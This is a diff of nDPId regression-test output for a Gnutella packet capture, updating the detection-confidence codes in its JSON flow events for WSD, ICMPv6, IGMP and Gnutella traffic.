-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_packet_id":1,"flow_last_seen":599415,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":599415,"pkt":"AQBef\/\/6CAAn5uVZCABFAAMg4MEAAAER2gIKAAIP7\/\/\/+vnVDnYDDAYbPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48c29hcDpFbnZlbG9wZSB4bWxuczpzb2FwPSJodHRwOi8vd3d3LnczLm9yZy8yMDAzLzA1L3NvYXAtZW52ZWxvcGUiIHhtbG5zOndzYT0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNC8wOC9hZGRyZXNzaW5nIiB4bWxuczp3c2Q9Imh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5Ij48c29hcDpIZWFkZXI+PHdzYTpUbz51cm46c2NoZW1hcy14bWxzb2FwLW9yZzp3czoyMDA1OjA0OmRpc2NvdmVyeTwvd3NhOlRvPjx3c2E6QWN0aW9uPmh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDQvZGlzY292ZXJ5L0J5ZTwvd3NhOkFjdGlvbj48d3NhOk1lc3NhZ2VJRD51cm46dXVpZDo5OGY3NGY3MS02ZGZjLTQ2MTItOWMzYy01YzU4MGViODM1OTY8L3dzYTpNZXNzYWdlSUQ+PHdzZDpBcHBTZXF1ZW5jZSBJbnN0YW5jZUlkPSI0NiIgU2VxdWVuY2VJZD0idXJuOnV1aWQ6NzY3Mzg5ZTAtZWU5YS00YzFjLWI5MDItMjBjYjgxZDIwM2UwIiBNZXNzYWdlTnVtYmVyPSI1Ij48L3dzZDpBcHBTZXF1ZW5jZT48L3NvYXA6SGVhZGVyPjxzb2FwOkJvZHk+PHdzZDpCeWU+PHdzYTpFbmRwb2ludFJlZmVyZW5jZT48d3NhOkFkZHJlc3M+dXJuOnV1aWQ6NzQ3ZjNkOTYtNjhhNy00M2YxLThjYmUtZThkNmRhZGQwMzU4PC93c2E6QWRkcmVzcz48L3dzYTpFbmRwb2ludFJlZmVyZW5jZT48L3dzZDpCeWU+PC9zb2FwOkJvZHk+PC9zb2FwOkVudmVsb3BlPg=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599415,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00541{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599426,"flow_last_seen":599426,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599426,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":1,"flow_last_seen":599426,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":599426,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOKkAAAAAQMAAAD\/AgAAAAAAAAAAAAAAAAAM"} -00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599426,"flow_last_seen":599426,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599426,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00602{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":599426,"flow_last_seen":599426,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599426,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":2,"flow_last_seen":599529,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":834,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":834,"pkt_l4_len":780,"thread_ts_msec":599529,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFAwwRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgMMdjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvQnllPC93c2E6QWN0aW9uPjx3c2E6TWVzc2FnZUlEPnVybjp1dWlkOjk4Zjc0ZjcxLTZkZmMtNDYxMi05YzNjLTVjNTgwZWI4MzU5Njwvd3NhOk1lc3NhZ2VJRD48d3NkOkFwcFNlcXVlbmNlIEluc3RhbmNlSWQ9IjQ2IiBTZXF1ZW5jZUlkPSJ1cm46dXVpZDo3NjczODllMC1lZTlhLTRjMWMtYjkwMi0yMGNiODFkMjAzZTAiIE1lc3NhZ2VOdW1iZXI9IjUiPjwvd3NkOkFwcFNlcXVlbmNlPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOkJ5ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDo3NDdmM2Q5Ni02OGE3LTQzZjEtOGNiZS1lOGQ2ZGFkZDAzNTg8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOkJ5ZT48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":2,"flow_last_seen":599747,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":599747,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOKkAAAAAQMAAAD\/AgAAAAAAAAAAAAAAAAAM"} 00571{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7490,"source":"gnutella.pcap","alias":"nDPId-test","packets-captured":7490,"packets-processed":7468,"total-skipped-flows":0,"total-l4-payload-len":3617715,"total-not-detected-flows":478,"total-guessed-flows":2,"total-detected-flows":170,"total-detection-updates":3,"total-updates":298,"current-active-flows":169,"total-active-flows":801,"total-idle-flows":632,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3938,"global_ts_msec":600247} @@ -3956,12 +3956,12 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.23.75.69","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":200000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490658,"flow_last_seen":490773,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":28681,"dst_port":16201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":131671,"flow_last_seen":551891,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.191.49.159","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3976,8 +3976,8 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490660,"flow_last_seen":490660,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.117.100.78","src_port":28681,"dst_port":9010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490659,"flow_last_seen":490696,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.153.21.93","src_port":28681,"dst_port":36696,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":12513,"flow_last_seen":14765,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":12513,"flow_last_seen":14765,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"finished","flow_packets_processed":365,"flow_first_seen":88704,"flow_last_seen":593692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":43484,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.65.217.224","src_port":28681,"dst_port":18381,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":490658,"flow_last_seen":548572,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -3988,8 +3988,8 @@ 00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":69142,"flow_last_seen":78169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.189.28.17","src_port":50234,"dst_port":16269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":88705,"flow_last_seen":97732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.118.116.198","src_port":50286,"dst_port":44616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 